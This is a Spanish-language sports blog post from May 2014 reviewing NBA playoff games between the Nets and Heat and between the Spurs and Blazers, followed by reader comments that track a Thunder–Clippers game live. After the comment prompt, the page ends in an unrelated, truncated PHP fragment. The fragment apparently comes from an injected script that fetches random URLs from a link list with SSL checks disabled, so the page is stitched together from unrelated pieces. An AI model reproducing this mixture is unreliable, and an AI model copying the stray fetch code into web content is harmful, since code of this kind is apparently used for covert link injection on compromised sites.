La Crónica: Apocalipsis triplista

11 de May de 2014 por TheDeerHunter

Se rompió la racha victoriosa de los Heat que se alargaba desde los dos últimos choques de la final del curso pasado. A los Nets les salió el partido perfecto ante su público, lo cual no resulta demasiado representativo respecto al global de la serie. Dominio abrumador del rebote y un acierto desde el triple escandaloso. Mal presagio el canastón desesperado desde 11 metros que enchufó Shaun Livingston en el primer cuarto, cuando LeBron y los suyos estaban dominando. A partir de ese momento todo fue a peor para ellos. 15 de 25 triples en lo que supuso la 5ª mayor exhibición desde la larga distancia de la historia de los playoffs. Destacaron particularmente Joe Johnson y Mirza Teletovic, quien mejor está sabiendo leer la defensa de los vigentes campeones. La fortaleza de la segunda unidad de Jason Kidd se constató con la mejor actuación de la carrera de Andray Blatche a estos niveles. También ayudaron Garnett, que estaba naufragando toda la serie, y Pierce, quien está defendiendo mejor “al bicho” de lo que parece. Deron no estuvo fino de cara al aro pero sí dirigió bien a sus compañeros. Veremos si en el cuarto se parecen algo a esta versión y ponen la máxima emoción y morbo al cruce. La primera ronda puso el listón demasiado alto como para que nos conformemos con lo que hay esta segunda.

Y es que los Spurs dejaron vista para sentencia su serie, con la tercera victoria lograda en el Moda Center sin excesiva oposición. Duro despertar del sueño de los Blazers. Los subcampeones son implacables y sólo les faltaba encontrar modo de controlar a Aldridge y Lillard. Nadie lo hubo para hacerlo con Parker y Duncan, que volvieron a dar otra clase magistral de saber estar en playoffs. El ala-pívot desplazó a Malone del 5º puesto de la lista de máximos anotadores históricos en postemporada. No hay color en las segundas unidades y eso que Belinelli no tuvo el día y Ginobili estuvo algo errático. Como anécdota vimos 4 minutitos de Claver, dándole tiempo a fallar 4 de 4 tiros libres. Salvo relajación máxima con el consiguiente broncón de Popovich no habrá 5º partido.

PREMIOS

MVP: Imparable Tony Parker. 29 puntos con 60% de acierto y 6 asistencias, con la sensación de hacer en cada momento lo que le venía en gana. Mención a parte la de Tim Duncan. 40 minutos le dieron al chaval y los aprovechó… no sabíamos si ponerlo en sorpresa, vaya. Qué escándalo de jugador.

Sorpresa: 12 minutitos de Patty Mills donde el hombre lo hizo todo bien. Un +15 que personaliza la filosofía coral de los Spurs.

Decepción: 16 de 44 en tiro entre LaMarcus Aldridge y Damian Lillard. Una serie que tardarán en olvidar estos excepcionales jugadores.

Esfuerzo en vano: En las contadas ocasiones que los Heat pierden el premio tiene nombre. LeBron James comenzó arrasando con 16 puntos en el primer cuarto aunque después se diluyó con 12 en el resto de partido. En realidad seguramente  hizo bien en no matarse para pelear un choque imposible. Habrán más ocasiones.

Comenta

13 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Nada nuevo bajo el sol. Los Spurs son demasiado para estos Blazers, está claro, igual que lo hubieran sido para los Rockets.

    Los Nets, pues alguno tenían que ganar, hoy se dieron varias condiciones, quizá ganen alguno más en la serie. Si se ponen 2-2, mucho ojo.

      Citar

  2. rumbero dice:
    #2

    Jose Luis:
    Los Nets, pues alguno tenían que ganar, hoy se dieron varias condiciones, quizá ganen alguno más en la serie. Si se ponen 2-2, mucho ojo.

    Pasó un poco lo que comentabas tu mismo en los primeros partidos de Wizards y Clippers, un festival de la leche desde T3 que decanta demasiado un partido. Más un buen control del rebote.
    Fundamental el Game 4. Lebron sabe que no puede permitirse el lujo de ponerse 2-2 con estos Nets. A ver si le vemos uno de esos partidos en modo apisonadora

      Citar

  3. Jose Luis dice:
    #3

    Paliza de los Thunder a los Clipprs por ahora. Muy enchufados los de Oklahoma.

    Si Rumbero, algún partido se decide por T3, pero bueno, lo normal es que eso no sea así. Si consiguen ponerse 2-2, ojo, pero lo normal es 3-1 en todas las eliminatorias, o asi lo veo yo visto lo visto. Quizá los Wizards, que tuvieron un TC bajísimo, renazcan un poco, peor no se puede hacer.

    Los Spurs, caso aparte

      Citar

  4. Jose Luis dice:
    #4

    Arreón de los Clippers, partido parejo ahora.

      Citar

  5. Blade Petrovic dice:
    #5

    CP· remonta el partido.El mejor base del mundo, +4 OKC

      Citar

  6. rumbero dice:
    #6

    Pues OKL ha aguantado el chaparrón a base de endurecer el juego viendo que no metían una en el 2º cuarto. Para eso tienen a Perkins que ni se molesta en hacer otra cosa que no sea pegar palos y provocar a Griffin cuando la buena defensa de Ibaka no es suficiente.

      Citar

  7. Jose Luis dice:
    #7

    De nuevo +15 el de Oklahoma

      Citar

  8. Jose Luis dice:
    #8

    +12 Okc al último cuarto… difícil que remonten los Clippers.

      Citar

  9. Jose Luis dice:
    #9

    se iguala la cosa, clutch time

      Citar

  10. Jose Luis dice:
    #10

    clippers +4, 30 segundos

      Citar

  11. Jose Luis dice:
    #11

    canasta OKC, 27 segundos, 2 arriba clippers

      Citar

  12. Jose Luis dice:
    #12

    final sin anotacion, 2-2, Clippers remontó en el último cuarto.

      Citar

  13. rumbero dice:
    #13

    Rivers le acaba de dar un meneo a Brooks que no sabe ni donde está.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>